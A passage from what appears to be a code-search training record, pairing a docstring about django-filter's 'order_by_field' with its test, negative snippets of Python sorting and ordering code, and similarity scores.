== 10\n assert users.has_next\n assert not users.has_prev\n assert users.pages == math.ceil(users.total / users.per_page)", "def test_sort_more_than_n(self):\n e1 = Experience(rid=1, uid=3, experience=100)\n e2 = Experience(rid=1, uid=1, experience=89)\n e3 = Experience(rid=1, uid=12, experience=1343)\n e4 = Experience(rid=1, uid=22, experience=1839)\n e5 = Experience(rid=1, uid=2, experience=20)\n db.session.add(e1)\n db.session.add(e2)\n db.session.add(e3)\n db.session.add(e4)\n db.session.add(e5)\n db.session.commit()\n list = top_n_in_order(1, 3)\n self.assertEqual([(22, 1839), (12, 1343), (3, 100)], list)", "def test_get_sort_value_with_after_object(self):\n test_object = self.test.datum_type2\n actual = test_object.get_sort_value(after_object=self.test.datum_type1)\n expected = 10101\n self.assertEqual(expected, actual)", "def _orderby_expression(self):\n return ''", "def sortby(self):\n return self._sortby", "def test_get_activities_order_sorted_by_last_comment_publish_date(self):\n from .mockers import user_comment\n from .mockers import user_status_context\n from .mockers import subscribe_context, create_context\n from .mockers import context_query\n\n username = 'messi'\n self.create_user(username)\n self.create_context(create_context)\n self.admin_subscribe_user_to_context(username, subscribe_context)\n activity_0_id = self.create_activity(username, user_status_context).json['id']\n activity_1_id = self.create_activity(username, user_status_context).json['id']\n activity_2_id = self.create_activity(username, user_status_context).json['id']\n res = self.testapp.post('/activities/%s/comments' % str(activity_1_id), json.dumps(user_comment), oauth2Header(username), status=201)\n\n res = self.testapp.get('/contexts/%s/activities?sortBy=activities' % (context_query['context']), '', oauth2Header(username), status=200)\n self.assertEqual(len(res.json), 3)\n self.assertEqual(res.json[0].get('id', None), activity_2_id)\n self.assertEqual(res.json[1].get('id', None), activity_1_id)\n self.assertEqual(res.json[2].get('id', None), activity_0_id)", "def test_entities__EntityOrder__isLast__2(entityOrder):\n assert not entityOrder.isLast(IEntity(IPhoneNumber))", "def test_get_tag_order_by(self):\n tag = \"pod_labels__key\"\n expected_param = (tag.split(\"__\")[1],)\n\n url = \"?\"\n query_params = self.mocked_query_params(url, OCPCpuView)\n handler = OCPReportQueryHandler(query_params)\n result = handler.get_tag_order_by(tag)\n expression = result.expression\n\n self.assertIsInstance(result, OrderBy)\n self.assertEqual(expression.sql, \"pod_labels -> %s\")\n self.assertEqual(expression.params, expected_param)", "def order_by(cls, *args):\n return cls.query.order_by(*args)", "def test_sorting_name2(self):\n # Name Decreasing sorting criteria is selected\n sorting_criteria = \"name_increasing\"\n # Search string that returns all of the users\n search_string = \"''\"\n # Search For all users\n resp = SearchTest.client.get('/api/search/',{\"token\":SearchTest.valid_token,\"search_string\":search_string,\"sorting_criteria\":sorting_criteria})\n search_result = json.loads(resp.content)\n for i in range(len(search_result)-1):\n self.assertLessEqual(search_result[i][\"name\"],search_result[i+1][\"name\"],\"{} sorting criteria doesn't work\".format(sorting_criteria))", "def test_sorting_album_year_time_added(self):\n self.add_mp3(artist='Artist', title='Title 1',\n album='Album 1', year=2017, filename='song1.mp3')\n self.add_mp3(artist='Artist', title='Title 2',\n album='Album 2', year=2017, filename='song2.mp3')\n self.run_add()\n al2 = self.age_album('Artist', 'Album 2', 10)\n self.assertEqual(Album.objects.count(), 2)\n\n albums = [\n al2,\n Album.objects.get(name='Album 1'),\n ]\n artist = Artist.objects.get(name='Artist')\n\n response = self.client.get(reverse('exordium:artist', args=(artist.normname,)), {'album-sort': 'year'})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context['albums'].data), 2)\n self.assertQuerysetEqual(response.context['albums'].data, [repr(al) for al in albums])\n self.assertContains(response, '\"?album-sort=-year\"')\n\n # test reverse sort\n response = self.client.get(reverse('exordium:artist', args=(artist.normname,)), {'album-sort': '-year'})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context['albums'].data), 2)\n self.assertQuerysetEqual(response.context['albums'].data, [repr(al) for al in reversed(albums)])\n self.assertContains(response, '\"?album-sort=year\"')", "def test_sort(self):\n expected = [\n self.TDTT(when=self.dt_when - (3*self.SORT_DELTA)),\n self.TDTT(when=self.dt_when - self.SORT_DELTA),\n self.TDTT(when=self.dt_when),\n self.TDTT(when=self.dt_when + self.SORT_DELTA),\n self.TDTT(when=self.dt_when + (2*self.SORT_DELTA)),\n ]\n self.assertTrue(self.is_sorted_ascending_by_when(expected))\n\n unsorted = [\n expected[3], expected[2], expected[4], expected[1], expected[0],\n ]\n self.assertFalse(self.is_sorted_ascending_by_when(unsorted))\n self.assertNotEquals(\n [str(dt) for dt in expected],\n [str(dt) for dt in unsorted])\n\n now_sorted = self.TDTT.sort(unsorted)\n self.assertTrue(self.is_sorted_ascending_by_when(now_sorted))\n self.assertEquals(\n [str(dt) for dt in expected],\n [str(dt) for dt in now_sorted])", "def is_not_in_descending_order(a):\n for i in range(len(a) - 1):\n if a[i] > a[i + 1]:\n return False\n return True", "def test_sorting_surname2(self):\n # Name Decreasing sorting criteria is selected\n sorting_criteria = \"surname_decreasing\"\n # Search string that returns all of the users\n search_string = \"''\"\n # Search For all users\n resp = SearchTest.client.get('/api/search/',{\"token\":SearchTest.valid_token,\"search_string\":search_string,\"sorting_criteria\":sorting_criteria})\n search_result = json.loads(resp.content)\n for i in range(len(search_result)-1):\n self.assertGreaterEqual(search_result[i][\"name\"],search_result[i+1][\"name\"],\"{} sorting criteria doesn't work\".format(sorting_criteria))", "def test_get_movies_order_by_rating(self):\n\n r = self.client.get(reverse('movieapi:movies'), {'order_by': 'rating'})\n\n qs = Movie.get_all().order_by('imdbrating')\n serializer = MovieSerializer(qs, many=True)\n\n self.assertJSONEqual(\n r.content,\n serializer.data\n )\n self.assertEqual(r.status_code, 200)", "def test_ordering(post_factory):\n now = timezone.now()\n\n p1 = post_factory(published=now - datetime.timedelta(hours=1))\n p2 = post_factory(published=now + datetime.timedelta(hours=1))\n p3 = post_factory(published=now)\n\n assert list(models.Post.objects.all()) == [p2, p3, p1]", "def order_by(self, results, key_, direction=\"ASC\"):\n\n return sorted(results, key=lambda x: x.get(key_), reverse=direction==\"DESC\")", "def test_query_sort_default_sort_order(self):\n doc_count = 10\n field_to_be_sorted_by = \"data\"\n prefix = get_rand_string()\n\n data = [prefix + \"-\" + str(x) for x in range(10)]\n\n # Same user_id for all documents\n user_id = get_rand_string()\n\n for datum in data:\n self.conn.add(id=get_rand_string(), user_id=user_id, data=datum)\n self.conn.commit()\n\n results = self.conn.query(q=\"user_id:\" + user_id, sort=\"data\").results\n\n self.assertEquals(len(results), doc_count,\n \"There should be %d documents returned, got:%d, results:%s\" % (\n doc_count, len(results), results))\n\n query_data = [doc[\"data\"] for doc in results]\n\n for idx, datum in enumerate(sorted(data)):\n self.assertEquals(datum, query_data[idx],\n \"Expected %s instead of %s on position %s in query_data:%s\" % (\n datum, query_data[idx], idx, query_data))", "def test_entities__EntityOrder__isLast__1(entityOrder):\n assert entityOrder.isLast(IEntity(IKeyword))", "def is_not_in_descending_order(a):\n for i in range(len(a)-1):\n if a[i] > a[i+1]:\n return False\n return True", "def order_by(self, *fields):\n self.query = self.query.sort(self._parse_order_spec(fields))\n return self", "def test_returns_sorted_projects_by_priority_if_sort_by_set_to_priority(self):\n # Arrange\n # Set priority of test_project_1 to urgent.\n self.test_project_1.priority = ProjectPriority.URGENT.value\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.private = False\n self.test_project_2.priority = ProjectPriority.HIGH.value\n self.test_project_2.save()\n # Set priority of test_project_1 to low and status to published.\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.priority = ProjectPriority.MEDIUM.value\n self.test_project_3.save()\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.PUBLISHED.value\n test_project_4.priority = ProjectPriority.LOW.value\n test_project_4.save()\n\n # Test for descending order\n # Act\n response_desc = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"orderBy\": \"priority\", \"orderByType\": \"DESC\"},\n )\n # Assert\n self.assertEqual(response_desc.status_code, 200)\n self.assertEqual(len(response_desc.json[\"results\"]), 4)\n expected_desc_order = [\n test_project_4.id,\n self.test_project_3.id,\n self.test_project_2.id,\n self.test_project_1.id,\n ]\n self.assertListEqual(\n [i[\"projectId\"] for i in response_desc.json[\"results\"]], expected_desc_order\n )\n\n # Test for ascending order\n # Act\n response_asc = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"orderBy\": \"priority\", \"orderByType\": \"ASC\"},\n )\n # Assert\n self.assertEqual(response_asc.status_code, 200)\n self.assertEqual(len(response_asc.json[\"results\"]), 4)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_asc.json[\"results\"]],\n expected_desc_order[::-1],\n )", "def test_get_entities_note_no_filter_default_sort(app):\n with app.app_context():\n notes = get_entities(Note, 1, 5)\n assert notes.page == 1\n assert notes.per_page == 5\n assert 'ORDER BY notes.id ASC' in str(notes.query.statement)\n assert notes.query.whereclause is None", "def test_reverse_sort_lines(self):\n before_b = \"\"\"\\\n a\n d\n e\n z\n x\n \"\"\"\n after_b = \"\"\"\\\n z\n x\n e\n d\n a\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"1.0\", \"5.1\"),\n after_sel=(\"1.0\", \"5.1\"),\n command_name=\"reverse-sort-lines\",\n )", "def test_latest_stories_ordering_after_on_homepage_toggle(self):\n user = User.objects.create_user(username='test',\n email='[email protected]',\n password='password')\n # Create some stories\n story1 = create_story(title=\"Test Featured Story\", \n summary=\"Test summary\", byline=\"Test byline\", \n author=user, status='published', on_homepage=True)\n story2 = create_story(title=\"Test Story 2\", \n summary=\"Test summary\", byline=\"Test byline\", \n author=user, status='published')\n story3 = create_story(title=\"Test Story 3\", \n summary=\"Test summary\", byline=\"Test byline\", \n author=user, status='published')\n story4 = create_story(title=\"Test Story 4\", \n summary=\"Test summary\", byline=\"Test byline\", \n author=user, status='published')\n\n # Render the latest story list\n t = Template(\"{% load story %}{% latest_stories %}\")\n c = Context()\n rendered = t.render(c)\n\n # Stories 2, 3, and 4 should be in the rendered output because\n # they're the most recently published\n self.assertNotIn(story1.title, rendered)\n self.assertIn(story2.title, rendered)\n self.assertIn(story3.title, rendered)\n self.assertIn(story4.title, rendered)\n\n # Toggle the ``on_homepage`` flag of story1\n story1.on_homepage = False\n story1.save()\n\n # Re-render the template and confirm that the first story still\n # doesn't appear in the latest stories list. Even though it's\n # last-updated date is changed when the ``on_homepage`` flag is\n # updated, the ``weight`` field, used to generate the latest\n # stories list shouldn't be affected.\n rendered = t.render(c)\n self.assertNotIn(story1.title, rendered)\n self.assertIn(story2.title, rendered)\n self.assertIn(story3.title, rendered)\n self.assertIn(story4.title, rendered)", "def assert_response_orders(self, *args, **kwargs):\n self.assert_response_order(*args, **kwargs)\n kwargs['order_by'] = '-' + kwargs['order_by']\n self.assert_response_order(*args, **kwargs)", "def ordering(self):\r\n if hasattr(self, \"queryset\"):\r\n aliases = {}\r\n for bound_column in self.table.columns:\r\n aliases[bound_column.order_by_alias] = bound_column.order_by\r\n try:\r\n return next(segment(self.queryset.query.order_by, aliases))\r\n except StopIteration:\r\n pass", "def test_get_entities_user_no_filter_default_sort(app):\n with app.app_context():\n users = get_entities(User, 1, 5)\n assert users.page == 1\n assert users.per_page == 5\n assert 'ORDER BY users.id ASC' in str(users.query.statement)\n assert users.query.whereclause is None", "def test_returns_sorted_projects_by_last_updated_date_if_sort_by_set_to_updated_at(\n self,\n ):\n # Arrange\n self.test_project_1.last_updated = datetime.utcnow() - timedelta(days=1)\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.last_updated = datetime.utcnow() - timedelta(days=2)\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set status of test_project_3 to published.\n self.test_project_3.last_updated = datetime.utcnow() - timedelta(days=3)\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.save()\n\n # Test returns sorted projects by last_updated_in descending order.\n # Act\n response_desc = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"orderBy\": \"last_updated\", \"orderByType\": \"DESC\"},\n )\n # Assert\n self.assertEqual(response_desc.status_code, 200)\n self.assertEqual(len(response_desc.json[\"results\"]), 3)\n expected_desc_order = [\n self.test_project_1.id,\n self.test_project_2.id,\n self.test_project_3.id,\n ]\n self.assertListEqual(\n [i[\"projectId\"] for i in response_desc.json[\"results\"]], expected_desc_order\n )\n\n # Test returns sorted projects by last_updated_in ascending order.\n # Act\n response_asc = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"orderBy\": \"last_updated\", \"orderByType\": \"ASC\"},\n )\n # Assert\n self.assertEqual(response_asc.status_code, 200)\n self.assertEqual(len(response_asc.json[\"results\"]), 3)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_asc.json[\"results\"]],\n expected_desc_order[::-1],\n )", "def get_sort_string(sort_column, sort_descending):\n if sort_column:\n sort_descending_string = \"desc\" if sort_descending else \"\"\n return \" ORDER BY %s %s\" % (sort_column, sort_descending_string) \n return \"\"", "def test_last_sort_value_with_sort_range(self):\n test_object = self.test.datum_type2\n actual = test_object._last_sort_value(10000, 10999)\n expected = 10100\n self.assertEqual(expected, actual)", "def extra_order_by_datetime_of_last_admin_comment(self, descending=False):\n if descending:\n order_by = ['-datetime_of_last_admin_comment']\n else:\n order_by = ['datetime_of_last_admin_comment']\n return self.extra_annotate_datetime_of_last_admin_comment().extra(\n order_by=order_by\n )", "def get_sort_query(self, kind, order, is_number):\n pass", "def assert_response_order(self, query, query_name, order_by, queries_count, model,\n get_value_instance, get_value_result):\n with self.assertNumQueries(queries_count):\n result = self.execute(query, dict(order=order_by))\n\n self.assertEqual(len(result[query_name]['edges']), self.count)\n self.assertNotEqual(get_value_result(result[query_name]['edges'][0]['node']),\n get_value_result(result[query_name]['edges'][self.count - 1]['node']))\n for i, instance in enumerate(model.objects.order_by(order_by)):\n self.assertEqual(get_value_result(result[query_name]['edges'][i]['node']), get_value_instance(instance))", "def test_entities__EntityOrder__isLast__4(entityOrder, minimalEntity):\n with pytest.raises(KeyError):\n entityOrder.isLast(minimalEntity)" ]
[ "0.68660283", "0.6728724", "0.6677009", "0.6650034", "0.65972036", "0.6469477", "0.64451", "0.6346018", "0.62945986", "0.62910104", "0.6286649", "0.6240998", "0.6212203", "0.619569", "0.618064", "0.61099553", "0.6034809", "0.5979432", "0.59784126", "0.59772485", "0.59331065", "0.592605", "0.59114116", "0.5900148", "0.5862058", "0.5830494", "0.58214355", "0.5703398", "0.5688422", "0.5684228", "0.5677334", "0.5675856", "0.56615275", "0.56508607", "0.5644567", "0.56298363", "0.5619091", "0.5597022", "0.5588665", "0.5548565", "0.5536525", "0.55330235", "0.5516477", "0.55136627", "0.55104786", "0.5503466", "0.549149", "0.548737", "0.54776293", "0.54768604", "0.54646045", "0.54639095", "0.5457084", "0.5447026", "0.5444988", "0.54449594", "0.5443586", "0.5442919", "0.54187095", "0.5404832", "0.5387478", "0.5385042", "0.5380504", "0.536984", "0.5367443", "0.5355222", "0.5340481", "0.5323927", "0.5322839", "0.5315017", "0.5310365", "0.53043884", "0.529854", "0.5282066", "0.5274263", "0.52737534", "0.5262082", "0.5262029", "0.52470845", "0.5246928", "0.5238138", "0.5236436", "0.5232487", "0.5231778", "0.52263534", "0.5216037", "0.51969486", "0.519619", "0.51911336", "0.5182202", "0.51799077", "0.5169249", "0.51488024", "0.51459885", "0.5140952", "0.5139586", "0.51322526", "0.51253074", "0.51080066", "0.5104027" ]
0.6622364
4
Set the `order_by_field` on the filterset and ensure that the field name is respected.
def test_ordering_with_overridden_field_name(self): class F(FilterSet): class Meta: model = User fields = ['username', 'status'] order_by = ['status'] order_by_field = 'order' f = F().form self.assertNotIn('o', f.fields) self.assertIn('order', f.fields) self.assertEqual(f.fields['order'].choices, [('status', 'Status')])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_ordering_with_overridden_field_name(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status']\n order_by_field = 'order'\n\n f = F({'order': 'status'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['carl', 'alex', 'jacob', 'aaron'], lambda o: o.username)", "def test_ordering_with_overridden_field_name_and_descending(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status', '-status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status'), ('-status', 'Status (descending)')])", "def order_by(self, order_by):\n\n self._order_by = order_by", "def set_sort_by(self, sort_by):\n\n\t\tif sort_by is not None and not isinstance(sort_by, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_by EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_by = sort_by\n\t\tself.__key_modified['sort_by'] = 1", "def user_order_by(self, field):\n # Get ordering model.\n model_label = order.utils.resolve_labels('.'.join(\\\n [self.model._meta.app_label, self.model._meta.object_name]))\n orderitem_set = getattr(self.model, \\\n order.utils.resolve_order_item_related_set_name(model_label))\n order_model = orderitem_set.related.model\n\n # Resolve ordering model table name.\n db_table = order_model._meta.db_table\n\n # Add ordering field as extra queryset fields.\n pk_name = self.model._meta.pk.attname\n\n # If we have a descending query remove '-' from field name when quering.\n sanitized_field = field.lstrip('-')\n\n extra_select = {\n sanitized_field: '(SELECT %s from %s WHERE item_id=%s.%s)' % \\\n (sanitized_field, db_table, self.model._meta.db_table, pk_name)\n }\n\n # Use original field name when ordering to allow for descending.\n return self.extra(select=extra_select).all().order_by(field)", "def order_queryset(self, queryset):\n if ordering := self.request.query_params.get(\"ordering\"):\n order_by = []\n regex = re.compile(r\"-?annotations__(?P<field_id>\\d+)\")\n fields = [field.strip() for field in ordering.split(\",\")]\n for match in filter(None, map(regex.match, fields)):\n field_id = match.group(\"field_id\")\n annotation_value = AnnotationValue.objects.filter(\n entity_id=OuterRef(\"pk\"), field_id=field_id\n ).values(\"_value__value\")\n annotate = {f\"_order_{field_id}\": Subquery(annotation_value)}\n queryset = queryset.annotate(**annotate)\n sign = \"-\" if match.string.startswith(\"-\") else \"\"\n order_by.append(f\"{sign}_order_{field_id}\")\n if order_by:\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *field_names):\n qs = copy(self)\n qs._order_by = field_names\n return qs", "def order_by(self, field_paths, order=None):\n raise NotImplementedError(\"This should have been implemented.\")", "def order_by(self, *fields):\n self.query = self.query.sort(self._parse_order_spec(fields))\n return self", "def sortby(self, sortby):\n self._sortby = sortby", "def sort_queryset(\n queryset: QuerySet, sort_by: SortInputObjectType, reversed: bool\n) -> QuerySet:\n sorting_direction = sort_by.direction\n if reversed:\n sorting_direction = REVERSED_DIRECTION[sorting_direction]\n\n sorting_field = sort_by.field\n sorting_attribute = getattr(sort_by, \"attribute_id\", None)\n\n if sorting_field is not None and sorting_attribute is not None:\n raise GraphQLError(\n \"You must provide either `field` or `attributeId` to sort the products.\"\n )\n elif sorting_attribute is not None: # empty string as sorting_attribute is valid\n return _sort_queryset_by_attribute(\n queryset, sorting_attribute, sorting_direction\n )\n\n sort_enum = sort_by._meta.sort_enum\n sorting_fields = sort_enum.get(sorting_field)\n sorting_field_name = sorting_fields.name.lower()\n\n custom_sort_by = getattr(sort_enum, f\"qs_with_{sorting_field_name}\", None)\n if custom_sort_by:\n queryset = custom_sort_by(queryset)\n\n sorting_field_value = sorting_fields.value\n sorting_list = [f\"{sorting_direction}{field}\" for field in sorting_field_value]\n\n return queryset.order_by(*sorting_list)", "def get_queryset(self):\n qs = super(SortForm, self).get_queryset()\n\n qs = self.pre_sort(qs)\n\n # Ensure that the form is valid\n if not self.is_valid():\n return qs\n\n # Do Sorting\n sorts = self.cleaned_data.get('sort', [])\n order_by = []\n for sort in sorts:\n param = self.HEADERS[abs(sort) - 1]['column']\n if sort < 0:\n param = '-' + param\n order_by.append(param)\n\n if order_by:\n qs = qs.order_by(*order_by)\n\n qs = self.post_sort(qs)\n\n return qs", "def order_by(self, *field_names):\n assert self.query.can_filter(), \\\n \"Cannot reorder a query once a slice has been taken.\"\n\n clone = self._clone()\n for field_name in field_names:\n clone.query.order_by.append(field_name)\n return clone", "def test_ordering_descending_unset(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = True\n\n f = F({'o': '-username'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['jacob', 'carl', 'alex', 'aaron'], lambda o: o.username)", "def order_by(self, value):\r\n # collapse empty values to ()\r\n order_by = () if not value else value\r\n # accept string\r\n order_by = order_by.split(',') if isinstance(order_by, six.string_types) else order_by\r\n valid = []\r\n # everything's been converted to a iterable, accept iterable!\r\n for alias in order_by:\r\n name = OrderBy(alias).bare\r\n if name in self.columns and self.columns[name].orderable:\r\n valid.append(alias)\r\n self._order_by = OrderByTuple(valid)\r\n self.data.order_by(self._order_by)", "def filter_and_order(cls, *args, **kwargs):\n return cls.query.filter_by(**kwargs).order_by(*args)", "def clean_order_by(self):\n\t\tresult = None\n\t\tmap_id = self.cleaned_data.get('order_by', '')\n\t\tif self._ORDER_BY_MAP.has_key(map_id):\n\t\t\tresult = self._ORDER_BY_MAP.get(map_id)\n\t\telse:\n\t\t\tresult = self._ORDER_BY_MAP.values()[0]\n\t\treturn result", "def sort_by(self, sort_direction: epl_imagery_pb2.SortDirection):\n # TODO if you want to sort by multiple parameters, then this class will have to have a pointer to the filter\n if self.metadata_filters.sorted_by:\n self.metadata_filters.sorted_by.query_params.sort_direction = epl_imagery_pb2.NOT_SORTED\n\n self.metadata_filters.sorted_by = self\n\n # class that contains it, and upon updating this class there is a call back to the container class to insert\n # this parameter in a list\n self.query_params.sort_direction = sort_direction\n self.b_initialized = True", "def order_by(self, *fields):\n self._evaluated = False\n if self._order is None:\n self._order = []\n\n for field in fields:\n direction = \"asc\"\n if field.startswith('-'):\n direction = \"desc\"\n field = field[1:]\n\n self._order.append({ field : direction })\n\n return self", "def orderby(cls, field, desc=False):\n cls.runtime.set_orderby((field, desc))\n return cls", "def order_by(self, field_name, direction=ASCENDING):\n\n from jetengine.fields.base_field import BaseField\n from jetengine.fields.list_field import ListField\n\n if isinstance(field_name, (ListField,)):\n raise ValueError(\n \"Can't order by a list field. If you meant to order by the size of the list, please use either an Aggregation Pipeline query (look for Document.objects.aggregate) or create an IntField with the size of the list field in your Document.\"\n )\n\n if isinstance(field_name, (BaseField,)):\n field_name = field_name.name\n\n if field_name not in self.__klass__._fields:\n raise ValueError(\n \"Invalid order by field '%s': Field not found in '%s'.\" % (field_name, self.__klass__.__name__)\n )\n\n field = self.__klass__._fields[field_name]\n self._order_fields.append((field.db_field, direction))\n return self", "def pre_sort(self, qs):\n return qs", "def ordering(self, qs):\n request = self.request\n # Number of columns that are used in sorting\n try:\n i_sorting_cols = int(request.REQUEST.get('iSortingCols', 0))\n except ValueError:\n i_sorting_cols = 0\n\n order = []\n order_columns = self.get_order_columns()\n for i in range(i_sorting_cols):\n # sorting column\n try:\n i_sort_col = int(request.REQUEST.get('iSortCol_%s' % i))\n except ValueError:\n i_sort_col = 0\n # sorting order\n s_sort_dir = request.REQUEST.get('sSortDir_%s' % i)\n\n sdir = '-' if s_sort_dir == 'desc' else ''\n\n sortcol = order_columns[i_sort_col]\n if isinstance(sortcol, list):\n for sc in sortcol:\n order.append('%s%s' % (sdir, sc))\n else:\n order.append('%s%s' % (sdir, sortcol))\n if order:\n return qs.order_by(*order)\n return qs", "def ordering(self):\r\n if hasattr(self, \"queryset\"):\r\n aliases = {}\r\n for bound_column in self.table.columns:\r\n aliases[bound_column.order_by_alias] = bound_column.order_by\r\n try:\r\n return next(segment(self.queryset.query.order_by, aliases))\r\n except StopIteration:\r\n pass", "def order_by(self, field, descending=False):\n self._order_by.append((field, descending))\n return self", "def orderby():\n pass", "def order_by(self, *field_names):\n if self.query.is_sliced:\n raise TypeError(\"Cannot reorder a query once a slice has been taken.\")\n obj = self._chain()\n obj.query.clear_ordering(force=True, clear_default=False)\n obj.query.add_ordering(*field_names)\n return obj", "def get_sort_field(self, kind, order, is_number):\n pass", "def order(self, field, direction=Order.ASC):\n if field == 'id':\n field = '_id'\n\n self._order_by.append((field, direction))\n\n return self", "def sortby(self):\n ...", "def get_sort_by(self):\n\n\t\treturn self.__sort_by", "def get_queryset(self):\n rs = super(BaseQuerysetMixin, self).get_queryset()\n if self.request.GET.get(\"ordering\") is None:\n rs = rs.order_by(\"id\")\n return rs", "def get_sort_by(self) -> SortField:\n if hasattr(self, \"json\") and isinstance(self.json, dict):\n sort_by_str = self.json.get(\"sort_by\", \"relevance\")\n if SortField.is_sort_field(sort_by_str):\n return SortField.from_str(sort_by_str)\n return SortField.relevance", "def __order_queryset(self, queryset):\n if self.get_paginate_by(queryset) and \\\n self.request.method == \"POST\" and self.__has_initially_selected_items():\n current_order_by = list(queryset.query.order_by)\n whenqueries = []\n max_index = 0\n for index, value in enumerate(self.get_selected_values_queryset().order_by(*current_order_by)):\n whenqueries.append(models.When(pk=value.pk, then=models.Value(index)))\n max_index = index\n queryset = queryset.annotate(\n cradmin_multiselect2_ordering=models.Case(\n *whenqueries,\n default=max_index + 1,\n output_field=models.IntegerField()\n )\n )\n order_by = ['cradmin_multiselect2_ordering']\n order_by.extend(current_order_by)\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *args):\n order_clauses = self.order_clauses[:]\n related_clauses = self.related_clauses[:]\n model = self.proxy.model\n for arg in args:\n if isinstance(arg, str):\n # Convert django-style to sqlalchemy ordering column\n if arg[0] == '-':\n field = arg[1:]\n ascending = False\n else:\n field = arg\n ascending = True\n\n col = resolve_member_column(model, field, related_clauses)\n\n if ascending:\n clause = col.asc()\n else:\n clause = col.desc()\n else:\n clause = arg\n if clause not in order_clauses:\n order_clauses.append(clause)\n return self.clone(order_clauses=order_clauses,\n related_clauses=related_clauses)", "def order_by(self):\r\n if self.column.order_by is not None:\r\n order_by = self.column.order_by\r\n else:\r\n # default to using column accessor as data source sort key\r\n order_by = OrderByTuple((self.accessor, ))\r\n return order_by.opposite if self.order_by_alias.is_descending else order_by", "def post_sort(self, qs):\n return qs", "def get_queryset(self):\n\n qs = super().get_queryset() # get company specific queryset\n\n filters = dict(self.request.GET.lists()) # dictionary of lists\n\n # pull out order_by and order\n order_by = filters.pop(\"order_by\", None)\n order = filters.pop(\"order\", None)\n\n # Ordering by JSON field taken from\n # https://stackoverflow.com/questions/36641759/django-1-9-jsonfield-order-by\n # Jan 2, 2018\n\n if order_by:\n if order:\n pass\n # TODO: Figure out what can be done for ordering...\n\n else:\n qs = qs.order_by(\"-id\") # default to descending id order\n\n for exp_filter in filters:\n try:\n qs = self.FILTERS[exp_filter](qs, filters[exp_filter])\n except KeyError:\n pass\n # do nothing if not a filter\n\n return qs", "def filter_queryset(self, qs):\n qs = super(ReleaseViewSet, self).filter_queryset(qs)\n if getattr(self, 'order_queryset', False):\n return sorted(qs, key=models.Release.version_sort_key)\n return qs", "def order_queryset_by_sort_order(get, qs):\n\n def get_string_from_tuple_list(lstTuples, number):\n \"\"\"Get the string value corresponding to a number in a list of number-string tuples\"\"\"\n sBack = [tup[1] for tup in lstTuples if tup[0] == number]\n return sBack\n\n # Helper: order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\n def order_queryset_by_tuple_list(qs, sOrder, sListName):\n \"\"\"Order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\"\"\"\n\n # Get a list of tuples for this sort-order\n tpList = build_choice_list(sListName)\n # Determine sort order: ascending is default\n bReversed = False\n if (sOrder[0:1] == '-'):\n # A starting '-' sign means: descending order\n sOrder = sOrder[1:]\n bReversed = True\n\n # Order the list of tuples alphabetically\n # (NOTE: they are alphabetical from 'build_choice_list()', except for the values 0,1)\n tpList = sorted(tpList, key=operator.itemgetter(1))\n # Order by the string-values in the tuple list\n return sorted(qs, key=lambda x: get_string_from_tuple_list(tpList, getattr(x, sOrder)), reverse=bReversed)\n\n # Set the default sort order\n sOrder = 'woord' # Default sort order if nothing is specified\n # See if the form contains any sort-order information\n if ('sortOrder' in get and get['sortOrder'] != ''):\n # Take the user-indicated sort order\n sOrder = get['sortOrder']\n\n # The ordering method depends on the kind of field:\n # (1) text fields are ordered straightforwardly\n # (2) fields made from a choice_list need special treatment\n if (sOrder.endswith('handedness')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handedness\")\n elif (sOrder.endswith('domhndsh') or sOrder.endswith('subhndsh')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handshape\")\n elif (sOrder.endswith('locprim')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Location\")\n else:\n # Use straightforward ordering on field [sOrder]\n ordered = qs.order_by(sOrder)\n\n # return the ordered list\n return ordered", "def get_queryset(self):\n search_str = self.request.GET.get('search')\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(name__icontains=search_str)\n b = Q(administrator__first_name__icontains = search_str)\n c = Q(administrator__last_name__icontains = search_str)\n d = Q(administrator__username__icontains = search_str)\n e = Q(types__name__icontains = search_str)\n f = Q(description__icontains = search_str)\n objects = Organization.objects.filter(a | b | c | d | e | f).distinct()\n\n else: # SORTING BY COL_NM\n if col_nm in ['name', 'description'] :\n objects = Organization.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == 